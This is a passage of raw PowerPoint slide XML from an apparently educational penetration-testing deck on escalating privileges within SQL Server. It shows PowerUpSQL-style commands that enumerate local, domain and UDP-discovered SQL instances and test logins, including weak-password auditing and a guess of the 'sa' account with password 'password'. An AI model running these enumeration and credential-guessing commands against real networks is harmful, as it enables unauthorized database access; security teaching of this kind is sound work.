              <a:t>Get-SQLInstanceLocal</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2133" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA5FF2A-EAF5-2642-B022-5C5E2488466C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649789" y="5897015"/>
            <a:ext cx="11041227" cy="379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defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Data.Sql.SqlDataSourceEnumerator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Instance.GetDataSources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368405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2E33-D320-6F40-8F51-5E77EDA1292C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084CCB95-0339-334B-8498-D3BEBD2F57AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>gain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>foothold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>unauthenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>cover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>unauthenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> user / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> user / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> user -&gt; SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>perspective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>due</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>fact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>excessive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>commonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> met on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>enterprise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{880CA5D3-94BF-6F43-84E3-39B2C84950A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4293096"/>
            <a:ext cx="11041227" cy="379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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>﻿&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-SQLInstanceLocal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-SQLConnectionTest</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C55465-D88E-8046-A8A3-6C5197C75767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4849701"/>
            <a:ext cx="11041227" cy="379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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>﻿&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-SQLInstanceDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Invoke-SQLAuditWeakLoginPW</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB8E80EA-CA10-E148-9C2F-121BB03EFF04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5407146"/>
            <a:ext cx="11041227" cy="6669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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLInstanceScanUDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLConnectionTestThreaded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867"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214747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91EE-2DED-1642-B5FF-BFDC3671B0E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D956AD5A-FCFE-8E4C-A4C7-44CF302A98B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server Express as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>backend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, are set up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>due</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
